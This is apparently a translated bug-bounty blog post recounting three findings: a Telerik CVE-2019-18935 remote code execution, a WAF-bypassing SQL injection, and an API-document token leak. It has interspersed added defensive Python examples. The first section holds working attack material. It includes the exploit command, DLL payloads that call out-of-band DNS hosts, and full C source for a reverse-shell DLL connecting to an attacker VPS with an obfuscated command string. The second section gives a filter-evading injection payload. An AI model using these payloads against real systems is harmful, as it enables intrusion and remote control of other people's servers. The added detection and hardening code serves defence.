
Title: Notes on web vulnerability mining


I dug a few bugs recently. Although they turned out to be duplicates, they still have some reference value, so I am sharing them here.

Getting duplicates is still very uncomfortable. But when you think about it, life rarely goes the way you want. A duplicate does not mean failure; it is just a matter of who got there first, and the order of discovery matters.

1. RCE on a certain site. Reason for being ignored: not in scope. Credit: a master and me. Thanks to the master for taking me along to test the domain: https://***.***:8089/

The site has CVE-2017-11357, CVE-2019-18935 and CVE-2017-9248.

Exploit download address:

https://github.com/noperator/CVE-2019-18935

https://github.com/noperator/CVE-2019-18935.git

Verification by delay (sleep 11s):

Test code, test.c:

    #include <windows.h>
    #include <stdio.h>

    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
    {
        if (fdwReason == DLL_PROCESS_ATTACH)
            // Sleep(10000); // Time interval in milliseconds.
            Sleep(11000);
        return TRUE;
    }

Compile test.c into amd642.dll.

Run: python CVE-2019-18935.py -v 2017.1.228 -p payloads\amd642.dll -u https://***.****:8089/Telerik.Web.UI.WebResource.axd?type=rau


The first step verifies successfully: with the payload the response is delayed by about 11s, while the original request takes about 2s.

Testing command execution:

    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>

    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
    {
        if (fdwReason == DLL_PROCESS_ATTACH) {
            // Out-of-band DNS lookups to confirm that the DLL actually ran.
            system("cmd.exe /c nslookup rsmwe.dnslog.cn");
            system("cmd.exe /c nslookup 2pstpep28u6vl9qrw0lhjwsr9if83x.burpcollaborator.net");
        }
        return TRUE;
    }

Compile test.c into amd642.dll.

Run again and check the DNS log:


Direct reverse shell, the generic exp:

    #include <winsock2.h>
    #include <stdio.h>
    #include <string.h>
    #include <windows.h>

    #pragma comment(lib, "ws2_32")

    #define HOST "{vps ip}"
    #define PORT {port}

    WSADATA wsaData;
    SOCKET Winsock;
    SOCKET Sock;
    struct sockaddr_in hax;
    char aip_addr[16];
    STARTUPINFO ini_processo;
    PROCESS_INFORMATION processo_info;

    // Adapted from https://github.com/infoskirmish/Window-Tools/blob/master/Simple%20Reverse%20Shell/shell.c
    void ReverseShell()
    {
        WSAStartup(MAKEWORD(2, 2), &wsaData);
        Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

        // Resolve HOST and connect back to it on PORT.
        struct hostent *host = gethostbyname(HOST);
        strcpy(aip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));
        hax.sin_family = AF_INET;
        hax.sin_port = htons(PORT);
        hax.sin_addr.s_addr = inet_addr(aip_addr);
        WSAConnect(Winsock, (SOCKADDR *)&hax, sizeof(hax), NULL, NULL, NULL, NULL);

        if (WSAGetLastError() == 0) {
            // Hand the socket to cmd.exe as its standard handles.
            memset(&ini_processo, 0, sizeof(ini_processo));
            ini_processo.cb = sizeof(ini_processo);
            ini_processo.dwFlags = STARTF_USESTDHANDLES;
            ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

            // "cmd.exe" assembled from fragments.
            char *myArray[4] = { "cm", "d.e", "x", "e" };
            char command[8] = "";
            snprintf(command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]);
            CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);
        }
    }

    DWORD WINAPI MainThread(LPVOID lpParam)
    {
        ReverseShell();
        return 0;
    }

    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
    {
        HANDLE hThread;
        if (fdwReason == DLL_PROCESS_ATTACH)
            hThread = CreateThread(0, 0, MainThread, 0, 0, 0);
        return TRUE;
    }

The privileges are not low: it runs as a domain user.

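As an added example (not part of the original post, nor of the noperator tooling it uses), here is the defender-side view of the same activity: a small parser for IIS W3C logs that flags POSTs to the RadAsyncUpload handler (Telerik.Web.UI.WebResource.axd?type=rau) and responses slow enough to match the sleep-based verification above (about 11s versus about 2s). The log lines are constructed, and the 5000 ms threshold and the field list are assumptions to be tuned against the site's own baseline.

```python
"""Flag RadAsyncUpload (RAU) handler traffic in IIS W3C logs.

Added example; the log below is constructed and the threshold is assumed.
"""
from dataclasses import dataclass

RAU_STEM = "telerik.web.ui.webresource.axd"
SLOW_MS = 5000  # assumed threshold; tune to the site's normal RAU timings

# Constructed sample log (not real traffic). The 11050 ms line mirrors the
# delay-based verification described in the post; 2010 ms is a normal upload.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status time-taken
2023-02-17 09:00:01 10.0.0.5 GET /Telerik.Web.UI.WebResource.axd type=rau 8089 203.0.113.7 200 120
2023-02-17 09:00:15 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 8089 203.0.113.7 200 2010
2023-02-17 09:01:40 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 8089 203.0.113.7 200 11050
2023-02-17 09:02:00 10.0.0.5 GET /Default.aspx - 8089 198.51.100.2 200 35
""".splitlines()


@dataclass
class Finding:
    client_ip: str
    method: str
    status: int
    time_taken_ms: int
    reason: str


def parse_w3c(lines):
    """Yield one dict per record, keyed by the most recent #Fields: header."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # header-less or malformed line: skip rather than guess
        yield dict(zip(fields, values))


def _to_int(value):
    try:
        return int(value)
    except ValueError:
        return 0  # IIS writes '-' for missing values


def is_rau_request(rec):
    stem = rec.get("cs-uri-stem", "").lower()
    query = rec.get("cs-uri-query", "").lower()
    return stem.endswith(RAU_STEM) and "type=rau" in query


def find_rau_activity(lines, slow_ms=SLOW_MS):
    """Return findings for POSTs to the RAU handler and for slow RAU responses."""
    findings = []
    for rec in parse_w3c(lines):
        if not is_rau_request(rec):
            continue
        method = rec.get("cs-method", "")
        time_taken = _to_int(rec.get("time-taken", "0"))
        reasons = []
        if method == "POST":
            reasons.append("POST to RAU handler (upload/deserialisation path)")
        if time_taken >= slow_ms:
            reasons.append(f"slow response ({time_taken} ms)")
        if reasons:
            findings.append(Finding(rec.get("c-ip", "-"), method,
                                    _to_int(rec.get("sc-status", "0")),
                                    time_taken, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for finding in find_rau_activity(SAMPLE_LOG):
        print(finding)
```

A site that legitimately uses RadAsyncUpload will also POST to this handler, so the POST rule is a triage signal rather than a verdict; the slow-response rule and a burst of POSTs from one client are what separate probing from normal uploads.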

2. SQL injection. Background: a friend sent me an injection point. It was quite tricky: there is a WAF from a certain cloud vendor, and the backend filters commas, single and double quotes, and the common functions. My idea was simple: hexadecimal plus the regexp function. I think there should be other approaches too.

(case+when+current_user+regexp+0x*+then+1+else+2*1e308+end) This way the database user can be obtained.

Here I want to say something about the CASE WHEN statement. It is much more flexible than we imagine; let me note a few points:

The most common form: [screenshot not reproduced]

Something less common: I wrote two demos, and one can go further along these lines:

case 1=1 when 2=2 then 1=1 else 1/0 end

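As an added example (not from the original post), the following shows why a CASE WHEN expression inside a parameter value is a boolean oracle against a concatenated query and inert against a parameterised one, and adds a request-side check for the shape of the payload above. SQLite in memory stands in for the MySQL backend the post was testing (the CASE WHEN syntax is the same); the table, the probe strings and the regex are assumptions.

```python
"""CASE WHEN probe against a concatenated query versus a bound parameter.

Added example; the database and probe strings are constructed.
"""
import re
import sqlite3
from urllib.parse import unquote_plus


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE item (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO item (name) VALUES (?)",
                     [("alpha",), ("beta",), ("gamma",)])
    return conn


def lookup_vulnerable(conn, item_id):
    """String concatenation: the caller's text becomes part of the SQL expression."""
    sql = f"SELECT name FROM item WHERE id = {item_id}"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn, item_id):
    """Type check first, then bind; a CASE WHEN payload never reaches the SQL parser."""
    return [row[0] for row in
            conn.execute("SELECT name FROM item WHERE id = ?", (int(item_id),))]


# Constructed probes in the style of the post's payload: the WHERE clause stays
# true or becomes false depending on the condition inside CASE WHEN, so the
# presence or absence of the row answers a yes/no question.
PROBE_TRUE = "1 AND (CASE WHEN 1=1 THEN 1 ELSE 0 END)"
PROBE_FALSE = "1 AND (CASE WHEN 1=2 THEN 1 ELSE 0 END)"

# Request-side check for the shape of the post's payload after URL decoding
# ('+' is a space): CASE ... WHEN, or REGEXP followed by a hex literal that
# stands in for a quoted string when quotes are filtered.
_PROBE_RE = re.compile(r"(?i)\bcase\b.*\bwhen\b|\bregexp\s+0x[0-9a-f]*")


def looks_like_case_when_probe(raw_param):
    return bool(_PROBE_RE.search(unquote_plus(raw_param)))


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, PROBE_TRUE))   # row returned: condition true
    print(lookup_vulnerable(db, PROBE_FALSE))  # no row: condition false
    try:
        lookup_parameterised(db, PROBE_TRUE)
    except ValueError as exc:
        print("rejected:", exc)
```

The regex is a triage aid for logs or a WAF rule, not a substitute for the parameterised query: filtering commas, quotes and function names, as the backend in the post did, still leaves CASE WHEN, REGEXP and hex literals available, which is exactly the gap the payload walked through.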

3. URL redirect + identity authentication token leak. I dug this one last night, and the reason it was ignored was duplicate. Sometimes I am speechless at some vendors: the vulnerabilities are there and they do not fix them. It gave me the illusion that, having found the bug, I had stepped on a honeypot. The asset scope was: vc-*.xxx.com

Actually I was quite happy to get this scope, because it allowed a simple fuzz, and I found a lot of assets.

I opened them one by one. Visiting vc-ss.xxx.com, the site redirects straight to a login prompt.

I am not a god, and I do not have an account either. I looked at the JS and found no path information.

So I started fuzzing. It is easy once you know it is PHP: I ran ffuf with a php/api dictionary and hit an interface development document, /api/***.html.

The intention behind an interface development document is good, but the screenshots and interface details in most of these documents carry the risk of secondary exploitation. The screenshot information was all in plain text, but unfortunately, after testing, I found that almost all the interfaces returned 401 on direct access and required authentication. I was a little helpless. When I wanted to give up, I told myself to persist and read carefully to the end. I kept staring at the interface document, flipping back and forth, and found an identity token leak and a few other security issues.

I submitted the bug and received a duplicate notice in the morning:

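The token leak above lived in plain text inside a published API document, so the check a defender wants is a secret scan over the document's text before it goes live. As an added example (not from the original post, and not describing the actual document found), the following scans HTML for JWT-looking strings, bearer headers pasted into curl examples, and token query parameters. The sample document and the token values are constructed, and the patterns are assumptions to be extended with the site's own token formats.

```python
"""Scan an API document's text for credential-looking strings.

Added example; the document and the tokens in it are constructed.
"""
import base64
import json
import re


def _b64url(obj):
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()


# Constructed JWT: a real-looking header and payload with a fake signature.
FAKE_JWT = (_b64url({"alg": "HS256", "typ": "JWT"}) + "."
            + _b64url({"sub": "demo"}) + ".fakesignature_000")

# Constructed API document in the style of an interface development page.
SAMPLE_DOC = f"""
<h2>GET /api/user/profile</h2>
<pre>curl -H "Authorization: Bearer {FAKE_JWT}" https://vc-example.invalid/api/user/profile</pre>
<p>Example response: {{"status": 200}}</p>
<h2>GET /api/report</h2>
<pre>https://vc-example.invalid/api/report?access_token=0123456789abcdef0123456789abcdef</pre>
"""

# Assumed patterns; group 1, where present, is the token value itself.
PATTERNS = {
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}"),
    "bearer": re.compile(r"(?i)authorization:\s*bearer\s+([A-Za-z0-9._~+/=-]{16,})"),
    "token_param": re.compile(r"(?i)[?&](?:access_)?token=([A-Za-z0-9._-]{16,})"),
}


def find_token_leaks(text):
    """Return (kind, value) pairs for every credential-looking string in text."""
    found = []
    for kind, pattern in PATTERNS.items():
        for match in pattern.finditer(text):
            value = match.group(1) if match.groups() else match.group(0)
            found.append((kind, value))
    return found


def mask(value, keep=6):
    """Report a finding without re-publishing the secret."""
    return value[:keep] + "..." + f"({len(value)} chars)"


if __name__ == "__main__":
    for kind, value in find_token_leaks(SAMPLE_DOC):
        print(f"{kind:12} {mask(value)}")
```

The same JWT is reported twice here, once by shape and once by its Authorization header, which is deliberate: a document may paste a token without the header, or use a header with a non-JWT format, and either alone is enough to fail the publishing check.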

Original link: https://www.cnblogs.com/piaomiaohongchen/p/17130283.html
